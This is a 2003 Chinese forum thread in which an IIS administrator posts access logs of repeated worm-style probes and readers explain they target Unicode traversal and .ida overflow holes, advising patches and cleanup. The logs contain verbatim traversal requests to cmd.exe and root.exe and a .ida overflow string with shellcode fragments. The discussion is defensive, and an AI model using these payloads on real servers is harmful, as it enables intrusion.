求助:如何防住他?如何保护自己?
我们服务器的日志上这几天留下大量的这样的记录:
而且服务器时间好像是在夜里2:00也有,4:00也有,
有点恐怖
对方好像乐此不疲的
我们服务器上好像还没有什么症状
IIS的补丁好像打不上去了,告诉我什么版本低什么的??
(我已经打过sp4了)
我不知道如何检查他到底做了什么?
到底想做什么?
问题是在对方经常性的连续的这样做
我实在有点受不了了
大家帮我看看:
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 16 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 16 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 15 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 16 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-09-02 22:20:16 202.119.68.77 - W3SVC1 PROXY 202.119. 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 0 - - - -
2003-09-02 21:24:35 202.119.68.77 - W3SVC1 PROXY 202.119. 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 0 - - - -
算了
记录太多了
不过全是以上的重复
最后一条的用的特别多
我怀疑是否得手了??
问题点数:0、回复次数:7Top
1 楼zenggao(天空下的云)回复于 2003-09-03 11:47:07 得分 0
它是在试探有没有漏洞可用。至于你机子有没有我可不知道。建议找一个关于IIS安全和入侵手段的书来看看。。。IIS是用很多的安全漏洞,但WIN2000以后就少多了,装IIS的时候不用的东东要删掉。然后注意打这方面的新的补丁。Top
2 楼ldqiao(友友)回复于 2003-09-03 11:56:44 得分 0
老是这样试
烦不烦呀?
只是我如何检查我的机器有没有中招呢Top
3 楼liuyann(liuyann)回复于 2003-09-03 14:18:20 得分 0
找个陷井程序,捕捉一下它.
或者把这个IP从IIS中剔除Top
4 楼ldqiao(友友)回复于 2003-09-03 16:13:19 得分 0
不想这样做了
只想看看他想干什么
有没有达到一些不可告人的东西吧Top
5 楼sungod8(琤) (Heros Ⅲ 凤凰)回复于 2003-09-03 16:48:47 得分 0
他想用UNICODE,IDA,IDC等漏洞来入侵你的系统,删除IIS安装时所有的脚本文件(包括目录),重新设置一个目录作为主目录,设置目录的访问权限,检查主目录下有什么陌生的东西.Top
6 楼ldqiao(友友)回复于 2003-09-03 20:06:43 得分 0
好像还没有
打足补丁就OK了吗Top
7 楼YYKLRZ(YYK)回复于 2003-09-03 20:30:21 得分 0
关注……Top
